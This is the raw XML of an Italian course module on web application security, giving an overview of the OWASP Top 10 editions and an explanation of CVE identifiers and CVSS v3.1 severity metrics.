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X1c78bbb325a7ff1d8fb2d8e85510613b5e9d176"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Modulo M6 — Sicurezza delle Applicazioni Web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6 — 9 ore (3h teoria + 6h laboratorio) — il modulo più tecnico del corso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M0 (ambiente), M1 (CIA Triad), M3 (HTTP), M5 (STRIDE)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Materiale di riferimento principale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dispensa-sviluppo-sicuro-software.docx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Capitoli 4-10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(cuore del modulo, riusato integralmente).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Questo documento è un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">orchestratore + cheat-sheet operativo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che integra la dispensa principale con:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. Indice ragionato per i 9h di M6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Checklist per ogni vulnerabilità</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(cosa cercare, cosa correggere)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Cheat-sheet di payload</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per i lab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Tabella mapping</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">OWASP ↔ CWE ↔ articolo GDPR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Setup rapido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bancapiccola-mini</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per i lab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="61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Mappa del modulo (9h)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OWASP Top 10:2025 — riepilogo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CVE/CVSS in 10 minuti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Checklist + cheat-sheet per vulnerabilità</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="cap4-1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t xml:space="preserve">4.1 SQL Injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="cap4-2">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t xml:space="preserve">4.2 Broken Access Control / IDOR</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="cap4-3">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t xml:space="preserve">4.3 Cryptographic Failures (password)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="cap4-4">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t xml:space="preserve">4.4 Cross-Site Scripting (XSS)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="cap4-5">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t xml:space="preserve">4.5 Vulnerable Components / Supply Chain</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="cap4-6">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t xml:space="preserve">4.6 Path Traversal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Setup rapido bancapiccola-mini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Mapping OWASP ↔ CWE ↔ GDPR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Checklist di chiusura modulo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Mappa del modulo (9h)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Sottomodulo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M6.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">OWASP Top 10:2025 + CVE/CVSS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M6.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SQL Injection (lab pesante)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M6.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Broken Access Control / IDOR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1,5h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M6.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Password e crittografia (bcrypt/Argon2id)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1,5h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M6.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cross-Site Scripting (XSS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1,5h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M6.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Supply Chain (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">pip-audit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M6.7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9h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Capitoli della dispensa principale corrispondenti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Sottomodulo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Capitolo dispensa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M6.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cap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M6.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cap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M6.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cap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M6.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cap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M6.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cap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M6.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cap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M6.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cap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Strategia operativa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: in aula segui i Cap 4-10 della dispensa principale,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">affiancando</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">questo materiale come checklist e cheat-sheet payload nei lab.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OWASP Top 10:2025 — riepilogo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quanto ci vorrà: 20 minuti.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="18" w:name="cosè-owasp"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1 Cos’è OWASP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">= Open Web Application Security Project. Fondazione no-profit nata nel 2001. Gold standard globale per la sicurezza applicativa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pubblica: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: classifica delle 10 vulnerabilità più diffuse, aggiornata ogni ~3 anni.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- OWASP API Security Top 10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- OWASP ASVS (Application Security Verification Standard)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- OWASP SAMM (Software Assurance Maturity Model)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Decine di tool gratuiti (ZAP, Dependency-Check, ecc.)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="18"/>
    <w:bookmarkStart w:id="19" w:name="la-top-10-nel-tempo"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2 La Top 10 nel tempo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2025 (proiezione)*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Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A01 Broken Access Control ↑</w:t>
            </w:r>
          </w:p>
        </w:tc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Broken Auth</w:t>
            </w:r>
          </w:p>
        </w:tc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Sensitive Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A03 Injection ↓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A03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XXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A04 Insecure Design (NEW)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A04 Insecure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 Broken Access Control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 Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A06 Vulnerable &amp; Outdated Components</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A06 Vulnerable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XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A07 Identification &amp; Auth Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A07 Identification &amp; Auth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 Insecure Deserialization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A08 Software &amp; Data Integrity (NEW)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A08 Software &amp; Data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 Vulnerable Components</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A09 Logging &amp; Monitoring Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A09 Logging &amp; Monitoring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 Insufficient Logging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A10 SSRF (NEW)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A10 SSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">* La Top 10 2025 è in elaborazione al momento di scrittura. Il corso usa sostanzialmente la 2021 con minor adjustments.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="19"/>
    <w:bookmarkStart w:id="20" w:name="X0979145eb41b1accb888bbc197a623ff96162a4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.3 Cosa tratteremo a fondo (vs cosa solo accenniamo)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">A fondo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(M6.2-M6.7):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- A01 Broken Access Control / IDOR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- A02 Cryptographic Failures (password)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- A03 Injection (SQL Injection)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- A06 Vulnerable Components (supply chain)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- XSS (anche se cambia categoria edizione per edizione)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Path Traversal (caso particolare di A01)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Accenni</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(sufficienti per il riconoscimento, dettaglio lasciato al secondo anno):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- A04 Insecure Design — già coperto da M5 (threat modeling)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- A05 Security Misconfiguration — già coperto da M3 (header)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- A07 Identification &amp; Auth Failures — coperto da M6.4 (password) + cenno JWT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- A08 Software &amp; Data Integrity — cenno in M6.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- A09 Logging &amp; Monitoring — cenno trasversale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- A10 SSRF — non trattato (rinvio al II anno ITS)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- CSRF — cenno in M3 (cookie SameSite)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CVE/CVSS in 10 minuti</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quanto ci vorrà: 15 minuti.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="20"/>
    <w:bookmarkStart w:id="21" w:name="cve-common-vulnerabilities-and-exposures"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1 CVE — Common Vulnerabilities and Exposures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Identificatore univoco di una vulnerabilità nota. Formato:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-AAAA-NNNNN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esempi famosi: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CVE-2014-0160</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Heartbleed (OpenSSL)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CVE-2017-5638</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Apache Struts (origine breach Equifax)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CVE-2021-44228</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Log4Shell (Log4j)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CVE-2024-3094</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— XZ Utils backdoor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Database principale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: NVD (National Vulnerability Database) — https://nvd.nist.gov</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Lifecycle di una CVE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Scoperta privata (researcher/internal)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Coordinated disclosure al vendor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Vendor sviluppa patch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CVE ID assegnato (RESERVED)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Patch + dettagli pubblicati (PUBLISHED)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NVD analizza e pubblica CVSS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aggiornati (pip-audit, Dependabot, ecc.)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="21"/>
    <w:bookmarkStart w:id="22" w:name="cvss-common-vulnerability-scoring-system"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2 CVSS — Common Vulnerability Scoring System</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sistema standard per</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">misurare la gravità</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di una vulnerabilità. Score da 0.0 a 10.0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Versione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: CVSS v3.1 (la più usata oggi). v4.0 sta uscendo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Bande di severity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 – 3.9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– 6.9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 – 8.9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9.0 – 10.0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2"/>
    <w:bookmarkStart w:id="23" w:name="le-base-metrics-di-cvss-v3.1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.3 Le Base Metrics di CVSS v3.1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Valori</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cosa misura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 Vector</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(AV)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Network, Adjacent, Local, Physical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Da dove si può sfruttare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 Complexity</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(AC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Low, High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Quanto è difficile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Privileges Required</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(PR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">None, Low, High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Servono privilegi?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Interaction</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(UI)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">None, Required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Serve azione utente?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t xml:space="preserve">Unchanged, Changed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Tocca altri sistemi?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  <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w: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None, Low, High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Impatto su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None, Low, High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Impatto su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None, Low, High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Impatto su A</w:t>
            </w:r>
